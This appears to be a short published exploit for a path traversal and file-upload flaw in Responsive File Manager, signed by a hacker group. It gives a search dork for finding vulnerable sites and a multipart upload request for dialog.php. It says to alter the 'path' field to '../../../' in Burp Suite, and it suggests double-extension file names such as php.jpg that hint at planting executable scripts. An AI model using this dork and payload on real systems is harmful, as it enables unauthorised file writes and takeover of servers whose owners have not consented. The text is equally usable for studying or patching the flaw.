Exploit Title: Responsive File Manager with Path Traversal
Author: L4663r666h05t x Indonesian Code Party
Vendor Homepage: https://www.responsivefilemanager.com/
Dork: inurl:/filemanager/ "dialog.php"
Reference Links:
https://www.exploit-db.com/exploits/45271
https://www.owasp.org/index.php/Path_Traversal
You need burpsuite in this case.
Request:
-------------------------------------------------
------WebKitFormBoundary00YRAbg8d9xdbAiC
Content-Disposition: form-data; name="path"
../source/
------WebKitFormBoundary00YRAbg8d9xdbAiC
Content-Disposition: form-data; name="path_thumb"
../thumbs/
------WebKitFormBoundary00YRAbg8d9xdbAiC
Content-Disposition: form-data; name="file"; filename="hworld.txt"
Content-Type: text/plain
- hello world ! -
------WebKitFormBoundary00YRAbg8d9xdbAiC--
-------------------------------------------------
Upload file in dialog.php (txt, html, php.jpg, php.fla, or php.accdb )
Start the burpsuite
change "../source/" into "../../../" or "../../" or "../"
(the number that the directory is replaced with ../)
-------------------------------------------------
Greetz: Exploiter ID - Indonesian Code Party - L@T